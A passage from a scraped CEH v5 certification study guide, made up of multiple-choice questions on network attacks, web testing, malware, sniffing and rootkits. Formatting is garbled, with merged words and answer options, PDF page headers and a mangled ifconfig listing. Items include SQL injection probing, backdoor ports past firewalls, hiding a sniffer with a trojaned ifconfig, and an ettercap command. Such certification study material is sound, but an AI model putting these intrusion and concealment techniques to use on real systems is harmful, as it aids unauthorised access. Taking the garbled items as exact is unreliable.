once reconstructed is over 65,536 bytes. From the information given, what typeof attack is Bryce attempting to perform?(Select the Best Answer)
SYN FloodSmurf
Ping of Death
Fraggle
Clive has been monitoring his IDS and sees that there are a huge number of
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 83/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 84/90
Joel and her team have been going through tons of garbage, recycled paper, andother rubbish in order to find some informationabout the target they are attempting to penetrate. How would you call this type of
activity?(Select the Best Answer)CI Gathering
Scanning
Dumpster Diving
Garbage Scooping
John has performed a scan of the web server with NMAP but did not gather
enough information to accurately identify whichoperating system is running on the remote host. How could you use a web serverto help in identifying the OS that is being
used?(Select the Best Answer)
Connect to the web server with a browser and look at the web pageConnect to the web server with an FTP client
Telnet to port 8080 on the web server and look at the default page code
Telnet to an open port and grab the banner
On default installation of Microsoft IIS web server, under which privilege does theweb server software is executed?
(Select the Best Answer)Everyone
Guest
System
Administrator
Barney is looking for a Windows NT/2000/XP command-line tool that can be
used to assign, display, or modify ACL's (accesscontrol lists) to files or folders and that could also be used within batch files.Which of the following tool can be used for that
purpose?(Select the Best Answer)PERM.exe
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 85/90
CACLS.exe
CLACS.exe
NTPERM.exe
Bob is very security conscious, he is about to test a site that is known to havemalicious applets, code, and more. Bob alwaysmakes use of a basic Web Browser to perform such testing, which of the
following web browsers can adequately fill thispurpose?
(Select the Best Answer)Internet ExplorerMozilla
Lynx
Tiger
While doing web application testing, you might be required to look throughmultiple web pages online which can take a long
time. Which process below would be a more efficient way of doing this type ofvalidation?
(Select the Best Answer)Use mget utility to download all pages locally for further inspection
Use wget utility to download all pages locally for further inspection
Use get * utility to download all pages locally for further inspectionUse get utility to download all pages locally for further inspection
Jane has just accessed her preferred ecommerce web site and she has seen an
item she would like to buy. Jane considersthe price a bit too steep, she looks at the page source code and decides to save
the page locally to modify some of the pagevariables. In the context of web application security, what do you think Jane has
changed?(Select the Best Answer)
A 'hidden' form field value
A 'hidden' price value
An integer variableA page cannot be changed locally, it is served by a web server
Bob has been hired to do a web application security test. Bob notices that the
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 86/90
site is dynamic and must make use of a backend database. Bob wants to validate if a SQL Injection would be possible. What
is the first character that Bob should useto attempt breaking valid SQL request?(Select the Best Answer)
Semi ColumnDouble Quote
Single Quote
Exclamation Mark
On wireless networks, SSID is used to identify the network. Why are SSID notconsidered to be a good security mechanismto protect a wireless network?
(Select the Best Answer)
The SSID is only 32 bits in lengthThe SSID is transmitted in clear text
The SSID is the same as the MAC address for all vendorsThe SSID is to identify a station, not a network
Melissa is a virus that targeted Microsoft Windows platforms. To which category
does this virus belong?(Select the Best Answer)
Polymorphic
Boot Sector infectorSystem
Macro
John is using a special tool on his Linux platform that has a database containingsignatures to be able to detect hundreds
of vulnerabilities in UNIX, Windows, and commonly-used web CGI scripts.Moreover, the database detects DDoS zombies
and Trojans as well. What would be the name of this tool?(Select the Best Answer)
nmaphping2
nessus
make
John is discussing security with Jane; she mentioned a few times to John that
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 87/90
she suspects an LKM was installed on herserver and this is why it has been acting so erratically lately. LKM stands for
Loadable Kernel Module, what does it meansin the context of Linux Security?(Select the Best Answer)
Loadable Kernel Modules are a mechanism for adding functionality to afilesystem without requiring a kernel recompilationLoadable Kernel Modules are a mechanism for adding functionality to an
operating-system kernel after it has been recompiledand the system rebooted
Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel
recompilation
Loadable Kernel Modules are a mechanism for adding functionality to an
operating-system kernel without requiring a kernel
recompilation
SSL has been seen as the solution to a lot of common security problems.Administrator will often time make use of SSL
to encrypt communications from points A to point B. Why do you think this couldbe a bad idea if there is an Intrusion Detection
System deployed to monitor the traffic between point A and B?(Select the Best Answer)SSL is redundant if you already have IDS's in place
SSL will trigger rules at regular interval and force the administrator to turn themoffSSL will slow down the IDS while it is breaking the encryption to see the packet
content
SSL will mask the content of the packet and Intrusion Detection System are
blinded
Curt has successfully compromised a web server sitting behind a firewall using a
vulnerability in the web server program.He would now like to install a backdoor program but knows that all ports are notopen inbound on the firewall. Which port
in the list below will most likely be open and allowed to reach the server that Curthas just compromised?(Select the Best Answer)
53
11025
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 88/90
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 89/90
password hashes and stores them for offline cracking.Once cracked, these passwords can provide easy access to whatever network
resources the user account has access to.But Jess is not picking up hashes from the network. Why?(Select the Best Answer)
The network protocol is configured to use SMB SigningThe physical network wire is on fibre optic cableThe network protocol is configured to use IPSEC
L0phtCrack SMB sniffing only works through Switches and not Hubs
Joseph the Hacker breaks into Hackcme Corporation's Linux system and plants awiretap program in order to sniff passwords
and user accounts off the wire. The wiretap program is embedded as a trojan in
one of the network utilities. Joseph is worriedthat network administrator might detect the wiretap program by querying theinterfaces to see if they are running in promiscuous
mode.Running "ifconfig -a" produces the following:
# ifconfig -alo0: flags=849>UP,LOOPBACK,RUNNING,MULTICAST< mtu8232inet 127.0.0.1 netmask ff000000hme0: fl
flags=863>UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,MULTICAST<mtu 1500inet 192.0.2.99 netmask ffffff00
broadcast 134.5.2.255 ether 8:0:20:9c:a2:35What can Joseph do to hide the wiretap program from being detected by ifconfigcommand?
(Select the Best Answer)Block output to the console whenever the user runs ifconfig command by runningscreen capture utility
Run the wiretap program in stealth mode from being detected by the ifconfigcommand
Replace original ifconfig utility with the rootkit version of ifconfig hidingPromiscuous information from being displayed on
the console
You cannot disable Promiscuous mode detection on Linux systems
What does the following command in "Ettercap" do?ettercap -NCLzs --quiet
(Select the Best Answer)This command will provide you the entire list of hosts in the LAN
This command will check if someone is poisoning you and will report its IP
8/14/2019 CEH v5 Exam Study Guide
http://slidepdf.com/reader/full/ceh-v5-exam-study-guide 90/90
This command will detach ettercap from console and log all the sniffed
passwords to a file
This command broadcasts ping to scan the LAN instead of ARP request all the
subnet IPs
------------------- GOOD LUCK ON THE EXAM ---------------------------------------